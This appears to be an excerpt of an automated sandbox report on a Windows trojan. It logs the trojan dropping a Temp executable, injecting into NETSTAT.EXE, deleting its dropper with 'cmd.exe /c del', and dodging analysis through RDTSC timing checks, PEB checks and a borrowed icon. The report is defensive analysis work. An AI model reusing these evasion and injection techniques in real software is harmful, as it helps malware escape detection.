          Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 15_2_00428C8015_2_00428C80
          Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 15_2_00422D8715_2_00422D87
          Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 15_2_00422D9015_2_00422D90
          Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 15_2_00422FB015_2_00422FB0
          Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: String function: 02C5B150 appears 136 times
          Source: C:\Users\user\AppData\Local\Temp\sfxwkrzgst.exeCode function: String function: 012AB150 appears 136 times
          Source: C:\Users\user\AppData\Local\Temp\sfxwkrzgst.exeCode function: 4_2_004185E0 NtCreateFile,4_2_004185E0
          Source: C:\Users\user\AppData\Local\Temp\sfxwkrzgst.exeCode function: 4_2_00418690 NtReadFile,4_2_00418690
          Source: C:\Users\user\AppData\Local\Temp\sfxwkrzgst.exeCode function: 4_2_00418710 NtClose,4_2_00418710
          Source: C:\Users\user\AppData\Local\Temp\sfxwkrzgst.exeCode function: 4_2_004187C0 NtAllocateVirtualMemory,4_2_004187C0
          Source: C:\Users\user\AppData\Local\Temp\sfxwkrzgst.exeCode function: 4_2_0041883A NtAllocateVirtualMemory,4_2_0041883A
          Source: C:\Users\user\AppData\Local\Temp\sfxwkrzgst.exeCode function: 4_2_0041868A NtReadFile,4_2_0041868A
          Source: C:\Users\user\AppData\Local\Temp\sfxwkrzgst.exeCode function: 4_2_004187BB NtAllocateVirtualMemory,4_2_004187BB
          Source: C:\Users\user\AppData\Local\Temp\sfxwkrzgst.exeCode function: 4_2_012E9910 NtAdjustPrivilegesToken,LdrInitializeThunk,4_2_012E9910
          Source: C:\Users\user\AppData\Local\Temp\sfxwkrzgst.exeCode function: 4_2_012E99A0 NtCreateSection,LdrInitializeThunk,4_2_012E99A0
          Source: C:\Users\user\AppData\Local\Temp\sfxwkrzgst.exeCode function: 4_2_012E9860 NtQuerySystemInformation,LdrInitializeThunk,4_2_012E9860
          Source: C:\Users\user\AppData\Local\Temp\sfxwkrzgst.exeCode function: 4_2_012E9840 NtDelayExecution,LdrInitializeThunk,4_2_012E9840
          Source: C:\Users\user\AppData\Local\Temp\sfxwkrzgst.exeCode function: 4_2_012E98F0 NtReadVirtualMemory,LdrInitializeThunk,4_2_012E98F0
          Source: C:\Users\user\AppData\Local\Temp\sfxwkrzgst.exeCode function: 4_2_012E9A20 NtResumeThread,LdrInitializeThunk,4_2_012E9A20
          Source: C:\Users\user\AppData\Local\Temp\sfxwkrzgst.exeCode function: 4_2_012E9A00 NtProtectVirtualMemory,LdrInitializeThunk,4_2_012E9A00
          Source: C:\Users\user\AppData\Local\Temp\sfxwkrzgst.exeCode function: 4_2_012E9A50 NtCreateFile,LdrInitializeThunk,4_2_012E9A50
          Source: C:\Users\user\AppData\Local\Temp\sfxwkrzgst.exeCode function: 4_2_012E9540 NtReadFile,LdrInitializeThunk,4_2_012E9540
          Source: C:\Users\user\AppData\Local\Temp\sfxwkrzgst.exeCode function: 4_2_012E95D0 NtClose,LdrInitializeThunk,4_2_012E95D0
          Source: C:\Users\user\AppData\Local\Temp\sfxwkrzgst.exeCode function: 4_2_012E9710 NtQueryInformationToken,LdrInitializeThunk,4_2_012E9710
          Source: C:\Users\user\AppData\Local\Temp\sfxwkrzgst.exeCode function: 4_2_012E97A0 NtUnmapViewOfSection,LdrInitializeThunk,4_2_012E97A0
          Source: C:\Users\user\AppData\Local\Temp\sfxwkrzgst.exeCode function: 4_2_012E9780 NtMapViewOfSection,LdrInitializeThunk,4_2_012E9780
          Source: C:\Users\user\AppData\Local\Temp\sfxwkrzgst.exeCode function: 4_2_012E9FE0 NtCreateMutant,LdrInitializeThunk,4_2_012E9FE0
          Source: C:\Users\user\AppData\Local\Temp\sfxwkrzgst.exeCode function: 4_2_012E9660 NtAllocateVirtualMemory,LdrInitializeThunk,4_2_012E9660
          Source: C:\Users\user\AppData\Local\Temp\sfxwkrzgst.exeCode function: 4_2_012E96E0 NtFreeVirtualMemory,LdrInitializeThunk,4_2_012E96E0
          Source: C:\Users\user\AppData\Local\Temp\sfxwkrzgst.exeCode function: 4_2_012E9950 NtQueueApcThread,4_2_012E9950
          Source: C:\Users\user\AppData\Local\Temp\sfxwkrzgst.exeCode function: 4_2_012E99D0 NtCreateProcessEx,4_2_012E99D0
          Source: C:\Users\user\AppData\Local\Temp\sfxwkrzgst.exeCode function: 4_2_012E9820 NtEnumerateKey,4_2_012E9820
          Source: C:\Users\user\AppData\Local\Temp\sfxwkrzgst.exeCode function: 4_2_012EB040 NtSuspendThread,4_2_012EB040
          Source: C:\Users\user\AppData\Local\Temp\sfxwkrzgst.exeCode function: 4_2_012E98A0 NtWriteVirtualMemory,4_2_012E98A0
          Source: C:\Users\user\AppData\Local\Temp\sfxwkrzgst.exeCode function: 4_2_012E9B00 NtSetValueKey,4_2_012E9B00
          Source: C:\Users\user\AppData\Local\Temp\sfxwkrzgst.exeCode function: 4_2_012EA3B0 NtGetContextThread,4_2_012EA3B0
          Source: C:\Users\user\AppData\Local\Temp\sfxwkrzgst.exeCode function: 4_2_012E9A10 NtQuerySection,4_2_012E9A10
          Source: C:\Users\user\AppData\Local\Temp\sfxwkrzgst.exeCode function: 4_2_012E9A80 NtOpenDirectoryObject,4_2_012E9A80
          Source: C:\Users\user\AppData\Local\Temp\sfxwkrzgst.exeCode function: 4_2_012E9520 NtWaitForSingleObject,4_2_012E9520
          Source: C:\Users\user\AppData\Local\Temp\sfxwkrzgst.exeCode function: 4_2_012EAD30 NtSetContextThread,4_2_012EAD30
          Source: C:\Users\user\AppData\Local\Temp\sfxwkrzgst.exeCode function: 4_2_012E9560 NtWriteFile,4_2_012E9560
          Source: C:\Users\user\AppData\Local\Temp\sfxwkrzgst.exeCode function: 4_2_012E95F0 NtQueryInformationFile,4_2_012E95F0
          Source: C:\Users\user\AppData\Local\Temp\sfxwkrzgst.exeCode function: 4_2_012E9730 NtQueryVirtualMemory,4_2_012E9730
          Source: C:\Users\user\AppData\Local\Temp\sfxwkrzgst.exeCode function: 4_2_012EA710 NtOpenProcessToken,4_2_012EA710
          Source: C:\Users\user\AppData\Local\Temp\sfxwkrzgst.exeCode function: 4_2_012E9760 NtOpenProcess,4_2_012E9760
          Source: C:\Users\user\AppData\Local\Temp\sfxwkrzgst.exeCode function: 4_2_012EA770 NtOpenThread,4_2_012EA770
          Source: C:\Users\user\AppData\Local\Temp\sfxwkrzgst.exeCode function: 4_2_012E9770 NtSetInformationFile,4_2_012E9770
          Source: C:\Users\user\AppData\Local\Temp\sfxwkrzgst.exeCode function: 4_2_012E9610 NtEnumerateValueKey,4_2_012E9610
          Source: C:\Users\user\AppData\Local\Temp\sfxwkrzgst.exeCode function: 4_2_012E9670 NtQueryInformationProcess,4_2_012E9670
          Source: C:\Users\user\AppData\Local\Temp\sfxwkrzgst.exeCode function: 4_2_012E9650 NtQueryValueKey,4_2_012E9650
          Source: C:\Users\user\AppData\Local\Temp\sfxwkrzgst.exeCode function: 4_2_012E96D0 NtCreateKey,4_2_012E96D0
          Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 15_2_02C99A50 NtCreateFile,LdrInitializeThunk,15_2_02C99A50
          Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 15_2_02C99840 NtDelayExecution,LdrInitializeThunk,15_2_02C99840
          Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 15_2_02C99860 NtQuerySystemInformation,LdrInitializeThunk,15_2_02C99860
          Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 15_2_02C999A0 NtCreateSection,LdrInitializeThunk,15_2_02C999A0
          Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 15_2_02C99910 NtAdjustPrivilegesToken,LdrInitializeThunk,15_2_02C99910
          Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 15_2_02C996D0 NtCreateKey,LdrInitializeThunk,15_2_02C996D0
          Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 15_2_02C996E0 NtFreeVirtualMemory,LdrInitializeThunk,15_2_02C996E0
          Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 15_2_02C99650 NtQueryValueKey,LdrInitializeThunk,15_2_02C99650
          Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 15_2_02C99660 NtAllocateVirtualMemory,LdrInitializeThunk,15_2_02C99660
          Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 15_2_02C99FE0 NtCreateMutant,LdrInitializeThunk,15_2_02C99FE0
          Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 15_2_02C99780 NtMapViewOfSection,LdrInitializeThunk,15_2_02C99780
          Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 15_2_02C99710 NtQueryInformationToken,LdrInitializeThunk,15_2_02C99710
          Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 15_2_02C995D0 NtClose,LdrInitializeThunk,15_2_02C995D0
          Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 15_2_02C99540 NtReadFile,LdrInitializeThunk,15_2_02C99540
          Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 15_2_02C99A80 NtOpenDirectoryObject,15_2_02C99A80
          Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 15_2_02C99A00 NtProtectVirtualMemory,15_2_02C99A00
          Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 15_2_02C99A10 NtQuerySection,15_2_02C99A10
          Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 15_2_02C99A20 NtResumeThread,15_2_02C99A20
          Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 15_2_02C9A3B0 NtGetContextThread,15_2_02C9A3B0
          Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 15_2_02C99B00 NtSetValueKey,15_2_02C99B00
          Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 15_2_02C998F0 NtReadVirtualMemory,15_2_02C998F0
          Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 15_2_02C998A0 NtWriteVirtualMemory,15_2_02C998A0
          Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 15_2_02C9B040 NtSuspendThread,15_2_02C9B040
          Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 15_2_02C99820 NtEnumerateKey,15_2_02C99820
          Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 15_2_02C999D0 NtCreateProcessEx,15_2_02C999D0
          Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 15_2_02C99950 NtQueueApcThread,15_2_02C99950
          Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 15_2_02C99670 NtQueryInformationProcess,15_2_02C99670
          Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 15_2_02C99610 NtEnumerateValueKey,15_2_02C99610
          Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 15_2_02C997A0 NtUnmapViewOfSection,15_2_02C997A0
          Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 15_2_02C99760 NtOpenProcess,15_2_02C99760
          Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 15_2_02C9A770 NtOpenThread,15_2_02C9A770
          Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 15_2_02C99770 NtSetInformationFile,15_2_02C99770
          Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 15_2_02C9A710 NtOpenProcessToken,15_2_02C9A710
          Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 15_2_02C99730 NtQueryVirtualMemory,15_2_02C99730
          Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 15_2_02C995F0 NtQueryInformationFile,15_2_02C995F0
          Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 15_2_02C99560 NtWriteFile,15_2_02C99560
          Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 15_2_02C99520 NtWaitForSingleObject,15_2_02C99520
          Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 15_2_02C9AD30 NtSetContextThread,15_2_02C9AD30
          Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 15_2_004385E0 NtCreateFile,15_2_004385E0
          Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 15_2_00438690 NtReadFile,15_2_00438690
          Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 15_2_00438710 NtClose,15_2_00438710
          Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 15_2_004387C0 NtAllocateVirtualMemory,15_2_004387C0
          Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 15_2_0043883A NtAllocateVirtualMemory,15_2_0043883A
          Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 15_2_0043868A NtReadFile,15_2_0043868A
          Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 15_2_004387BB NtAllocateVirtualMemory,15_2_004387BB
          Source: 4505682666.exeVirustotal: Detection: 42%
          Source: 4505682666.exeReversingLabs: Detection: 52%
          Source: C:\Users\user\Desktop\4505682666.exeFile read: C:\Users\user\Desktop\4505682666.exeJump to behavior
          Source: 4505682666.exeStatic PE information: Section: .text IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_READ
          Source: C:\Users\user\Desktop\4505682666.exeKey opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiersJump to behavior
          Source: unknownProcess created: C:\Users\user\Desktop\4505682666.exe "C:\Users\user\Desktop\4505682666.exe"
          Source: C:\Users\user\Desktop\4505682666.exeProcess created: C:\Users\user\AppData\Local\Temp\sfxwkrzgst.exe C:\Users\user\AppData\Local\Temp\sfxwkrzgst.exe C:\Users\user\AppData\Local\Temp\sxlvpqj
          Source: C:\Users\user\AppData\Local\Temp\sfxwkrzgst.exeProcess created: C:\Users\user\AppData\Local\Temp\sfxwkrzgst.exe C:\Users\user\AppData\Local\Temp\sfxwkrzgst.exe C:\Users\user\AppData\Local\Temp\sxlvpqj
          Source: C:\Windows\explorer.exeProcess created: C:\Windows\SysWOW64\NETSTAT.EXE C:\Windows\SysWOW64\NETSTAT.EXE
          Source: C:\Windows\SysWOW64\NETSTAT.EXEProcess created: C:\Windows\SysWOW64\cmd.exe /c del "C:\Users\user\AppData\Local\Temp\sfxwkrzgst.exe"
          Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
          Source: C:\Users\user\Desktop\4505682666.exeProcess created: C:\Users\user\AppData\Local\Temp\sfxwkrzgst.exe C:\Users\user\AppData\Local\Temp\sfxwkrzgst.exe C:\Users\user\AppData\Local\Temp\sxlvpqjJump to behavior
          Source: C:\Users\user\AppData\Local\Temp\sfxwkrzgst.exeProcess created: C:\Users\user\AppData\Local\Temp\sfxwkrzgst.exe C:\Users\user\AppData\Local\Temp\sfxwkrzgst.exe C:\Users\user\AppData\Local\Temp\sxlvpqjJump to behavior
          Source: C:\Windows\SysWOW64\NETSTAT.EXEProcess created: C:\Windows\SysWOW64\cmd.exe /c del "C:\Users\user\AppData\Local\Temp\sfxwkrzgst.exe"Jump to behavior
          Source: C:\Users\user\Desktop\4505682666.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{1f486a52-3cb1-48fd-8f50-b8dc300d9f9d}\InProcServer32Jump to behavior
          Source: C:\Users\user\Desktop\4505682666.exeCode function: 0_2_004034F7 EntryPoint,SetErrorMode,GetVersionExW,GetVersionExW,GetVersionExW,lstrlenA,#17,OleInitialize,SHGetFileInfoW,GetCommandLineW,CharNextW,GetTempPathW,GetTempPathW,GetWindowsDirectoryW,lstrcatW,GetTempPathW,lstrcatW,SetEnvironmentVariableW,SetEnvironmentVariableW,SetEnvironmentVariableW,DeleteFileW,lstrcatW,lstrcatW,lstrcatW,lstrcmpiW,SetCurrentDirectoryW,DeleteFileW,CopyFileW,CloseHandle,ExitProcess,OleUninitialize,ExitProcess,GetCurrentProcess,OpenProcessToken,LookupPrivilegeValueW,AdjustTokenPrivileges,ExitWindowsEx,ExitProcess,0_2_004034F7
          Source: C:\Users\user\Desktop\4505682666.exeFile created: C:\Users\user\AppData\Local\Temp\nsz176B.tmpJump to behavior
          Source: classification engineClassification label: mal100.troj.evad.winEXE@9/3@7/4
          Source: C:\Users\user\Desktop\4505682666.exeCode function: 0_2_004021AA CoCreateInstance,0_2_004021AA
          Source: C:\Users\user\Desktop\4505682666.exeFile read: C:\Users\desktop.iniJump to behavior
          Source: C:\Users\user\Desktop\4505682666.exeCode function: 0_2_00404954 GetDlgItem,SetWindowTextW,SHBrowseForFolderW,CoTaskMemFree,lstrcmpiW,lstrcatW,SetDlgItemTextW,GetDiskFreeSpaceW,MulDiv,SetDlgItemTextW,0_2_00404954
          Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:6972:120:WilError_01
          Source: C:\Windows\explorer.exeFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
          Source: C:\Windows\explorer.exeFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
          Source: 4505682666.exeStatic PE information: NO_SEH, TERMINAL_SERVER_AWARE, DYNAMIC_BASE, NX_COMPAT
          Source: Binary string: netstat.pdbGCTL source: sfxwkrzgst.exe, 00000004.00000002.335855686.0000000001270000.00000040.10000000.00040000.00000000.sdmp
          Source: Binary string: netstat.pdb source: sfxwkrzgst.exe, 00000004.00000002.335855686.0000000001270000.00000040.10000000.00040000.00000000.sdmp
          Source: Binary string: wntdll.pdbUGP source: sfxwkrzgst.exe, 00000002.00000003.252451378.0000000002910000.00000004.00001000.00020000.00000000.sdmp, sfxwkrzgst.exe, 00000002.00000003.251040803.0000000002780000.00000004.00001000.00020000.00000000.sdmp, sfxwkrzgst.exe, 00000004.00000002.336274086.000000000139F000.00000040.00000800.00020000.00000000.sdmp, sfxwkrzgst.exe, 00000004.00000002.335868702.0000000001280000.00000040.00000800.00020000.00000000.sdmp, NETSTAT.EXE, 0000000F.00000002.512606910.0000000002C30000.00000040.00000800.00020000.00000000.sdmp, NETSTAT.EXE, 0000000F.00000002.513012657.0000000002D4F000.00000040.00000800.00020000.00000000.sdmp
          Source: Binary string: wntdll.pdb source: sfxwkrzgst.exe, sfxwkrzgst.exe, 00000004.00000002.336274086.000000000139F000.00000040.00000800.00020000.00000000.sdmp, sfxwkrzgst.exe, 00000004.00000002.335868702.0000000001280000.00000040.00000800.00020000.00000000.sdmp, NETSTAT.EXE, NETSTAT.EXE, 0000000F.00000002.512606910.0000000002C30000.00000040.00000800.00020000.00000000.sdmp, NETSTAT.EXE, 0000000F.00000002.513012657.0000000002D4F000.00000040.00000800.00020000.00000000.sdmp
          Source: C:\Users\user\AppData\Local\Temp\sfxwkrzgst.exeCode function: 4_2_0041B822 push eax; ret 4_2_0041B828
          Source: C:\Users\user\AppData\Local\Temp\sfxwkrzgst.exeCode function: 4_2_0041B82B push eax; ret 4_2_0041B892
          Source: C:\Users\user\AppData\Local\Temp\sfxwkrzgst.exeCode function: 4_2_0041B88C push eax; ret 4_2_0041B892
          Source: C:\Users\user\AppData\Local\Temp\sfxwkrzgst.exeCode function: 4_2_0041D246 push 3317952Ch; ret 4_2_0041D4A7
          Source: C:\Users\user\AppData\Local\Temp\sfxwkrzgst.exeCode function: 4_2_00415D74 push ebx; ret 4_2_00415D75
          Source: C:\Users\user\AppData\Local\Temp\sfxwkrzgst.exeCode function: 4_2_00415E30 push ds; iretd 4_2_00415E32
          Source: C:\Users\user\AppData\Local\Temp\sfxwkrzgst.exeCode function: 4_2_0041B7D5 push eax; ret 4_2_0041B828
          Source: C:\Users\user\AppData\Local\Temp\sfxwkrzgst.exeCode function: 4_2_0040C7E1 pushfd ; retf 4_2_0040C7EA
          Source: C:\Users\user\AppData\Local\Temp\sfxwkrzgst.exeCode function: 4_2_012FD0D1 push ecx; ret 4_2_012FD0E4
          Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 15_2_02CAD0D1 push ecx; ret 15_2_02CAD0E4
          Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 15_2_0043B822 push eax; ret 15_2_0043B828
          Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 15_2_0043B82B push eax; ret 15_2_0043B892
          Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 15_2_0043D0C5 push ebp; ret 15_2_0043D0C7
          Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 15_2_0043B88C push eax; ret 15_2_0043B892
          Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 15_2_0043D3EA push 3317952Ch; ret 15_2_0043D4A7
          Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 15_2_00435D74 push ebx; ret 15_2_00435D75
          Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 15_2_00435E30 push ds; iretd 15_2_00435E32
          Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 15_2_0043B7D5 push eax; ret 15_2_0043B828
          Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 15_2_0042C7E1 pushfd ; retf 15_2_0042C7EA
          Source: C:\Users\user\Desktop\4505682666.exeFile created: C:\Users\user\AppData\Local\Temp\sfxwkrzgst.exeJump to dropped file

          Hooking and other Techniques for Hiding and Protection

          barindex
          Icon mismatch, binary includes an icon from a different legit application in order to fool users
          Source: initial sampleIcon embedded in binary file: icon matches a legit application icon: download (95).png
          Source: C:\Users\user\Desktop\4505682666.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\NETSTAT.EXEProcess information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOXJump to behavior

          Malware Analysis System Evasion

          barindex
          Found evasive API chain (may stop execution after reading information in the PEB, e.g. number of processors)
          Source: C:\Users\user\AppData\Local\Temp\sfxwkrzgst.exeEvasive API call chain: GetPEB, DecisionNodes, ExitProcessgraph_2-455
          Tries to detect virtualization through RDTSC time measurements
          Source: C:\Users\user\AppData\Local\Temp\sfxwkrzgst.exeRDTSC instruction interceptor: First address: 0000000000408604 second address: 000000000040860A instructions: 0x00000000 rdtsc 0x00000002 xor ecx, ecx 0x00000004 add ecx, eax 0x00000006 rdtsc
          Source: C:\Users\user\AppData\Local\Temp\sfxwkrzgst.exeRDTSC instruction interceptor: First address: 000000000040899E second address: 00000000004089A4 instructions: 0x00000000 rdtsc 0x00000002 xor ecx, ecx 0x00000004 add ecx, eax 0x00000006 rdtsc
          Source: C:\Windows\SysWOW64\NETSTAT.EXERDTSC instruction interceptor: First address: 0000000000428604 second address: 000000000042860A instructions: 0x00000000 rdtsc 0x00000002 xor ecx, ecx 0x00000004 add ecx, eax 0x00000006 rdtsc
          Source: C:\Windows\SysWOW64\NETSTAT.EXERDTSC instruction interceptor: First address: 000000000042899E second address: 00000000004289A4 instructions: 0x00000000 rdtsc 0x00000002 xor ecx, ecx 0x00000004 add ecx, eax 0x00000006 rdtsc
          Source: C:\Windows\SysWOW64\NETSTAT.EXE TID: 3308Thread sleep time: -32000s >= -30000sJump to behavior
          Source: C:\Windows\SysWOW64\NETSTAT.EXELast function: Thread delayed
          Source: C:\Users\user\AppData\Local\Temp\sfxwkrzgst.exeCode function: 4_2_004088D0 rdtsc 4_2_004088D0
          Source: C:\Users\user\AppData\Local\Temp\sfxwkrzgst.exeAPI coverage: 6.2 %
          Source: C:\Windows\SysWOW64\NETSTAT.EXEAPI coverage: 6.8 %
          Source: C:\Users\user\AppData\Local\Temp\sfxwkrzgst.exeProcess information queried: ProcessInformationJump to behavior
          Source: C:\Users\user\Desktop\4505682666.exeCode function: 0_2_00405C13 GetTempPathW,DeleteFileW,lstrcatW,lstrcatW,lstrlenW,FindFirstFileW,FindNextFileW,FindClose,0_2_00405C13
          Source: C:\Users\user\Desktop\4505682666.exeCode function: 0_2_0040683D FindFirstFileW,FindClose,0_2_0040683D
          Source: C:\Users\user\Desktop\4505682666.exeCode function: 0_2_0040290B FindFirstFileW,0_2_0040290B
          Source: C:\Users\user\Desktop\4505682666.exeAPI call chain: ExitProcess graph end nodegraph_0-3759
          Source: explorer.exe, 00000006.00000000.266949938.00000000080ED000.00000004.00000001.00020000.00000000.sdmpBinary or memory string: SCSI\Disk&Ven_VMware&Prod_Virtual_disk\5&1ec51bf7&0&000000
          Source: explorer.exe, 00000006.00000000.299532501.0000000008223000.00000004.00000001.00020000.00000000.sdmpBinary or memory string: \\?\STORAGE#Volume#{e6e9dfc6-98f2-11e9-90ce-806e6f6e6963}#0000000025700000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\STORAGE#Volume#{e6e9dfc6-98f2-11e9-90ce-806e6f6e6963}#000000001F400000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\STORAGE#Volume#{e6e9dfc6-98f2-11e9-90ce-806e6f6e6963}#0000000026700000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\STORAGE#Volume#{e6e9dfc6-98f2-11e9-90ce-806e6f6e6963}#0000000000100000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#5&280b647&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\SCSI#CdRom&Ven_Msft&Prod_Virtual_DVD-ROM#2&1f4adffe&0&000001#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}*^d
          Source: explorer.exe, 00000006.00000000.299532501.0000000008223000.00000004.00000001.00020000.00000000.sdmpBinary or memory string: \\?\STORAGE#Volume#{e6e9dfc6-98f2-11e9-90ce-806e6f6e6963}#0000000025700000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\STORAGE#Volume#{e6e9dfc6-98f2-11e9-90ce-806e6f6e6963}#000000001F400000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\STORAGE#Volume#{e6e9dfc6-98f2-11e9-90ce-806e6f6e6963}#0000000026700000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\STORAGE#Volume#{e6e9dfc6-98f2-11e9-90ce-806e6f6e6963}#0000000000100000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#5&280b647&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\SCSI#CdRom&Ven_Msft&Prod_Virtual_DVD-ROM#2&1f4adffe&0&000001#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}m&ven_n
          Source: explorer.exe, 00000006.00000000.273156967.0000000000680000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: _VMware_SATA_CD00#5&280b647&
          Source: explorer.exe, 00000006.00000000.274096213.0000000004287000.00000004.00000001.00020000.00000000.sdmpBinary or memory string: \\?\STORAGE#Volume#{e6e9dfc6-98f2-11e9-90ce-806e6f6e6963}#0000000025700000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\STORAGE#Volume#{e6e9dfc6-98f2-11e9-90ce-806e6f6e6963}#000000001F400000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\STORAGE#Volume#{e6e9dfc6-98f2-11e9-90ce-806e6f6e6963}#0000000026700000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\STORAGE#Volume#{e6e9dfc6-98f2-11e9-90ce-806e6f6e6963}#0000000000100000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#5&280b647&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\SCSI#CdRom&Ven_Msft&Prod_Virtual_DVD-ROM#2&1f4adffe&0&000001#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}
          Source: explorer.exe, 00000006.00000000.273175014.000000000069D000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: \\?\scsi#cdrom&ven_necvmwar&prod_vmware_sata_cd00#5&280b647&0&000000#{53f56308-b6bf-11d0-94f2-00a0c91efb8b}
          Source: explorer.exe, 00000006.00000000.299532501.0000000008223000.00000004.00000001.00020000.00000000.sdmpBinary or memory string: VMware SATA CD00
          Source: explorer.exe, 00000006.00000000.299532501.0000000008223000.00000004.00000001.00020000.00000000.sdmpBinary or memory string: \\?\STORAGE#Volume#{e6e9dfc6-98f2-11e9-90ce-806e6f6e6963}#0000000025700000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\STORAGE#Volume#{e6e9dfc6-98f2-11e9-90ce-806e6f6e6963}#000000001F400000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\STORAGE#Volume#{e6e9dfc6-98f2-11e9-90ce-806e6f6e6963}#0000000026700000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\STORAGE#Volume#{e6e9dfc6-98f2-11e9-90ce-806e6f6e6963}#0000000000100000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#5&280b647&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\SCSI#CdRom&Ven_Msft&Prod_Virtual_DVD-ROM#2&1f4adffe&0&000001#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}t]
          Source: 4505682666.exe, 00000000.00000003.256791543.00000000007AE000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: \\?\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#5&280b647&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\\?\Volume{e6e9dfd8-98f2-11e9-90ce-806e6f6e6963}\
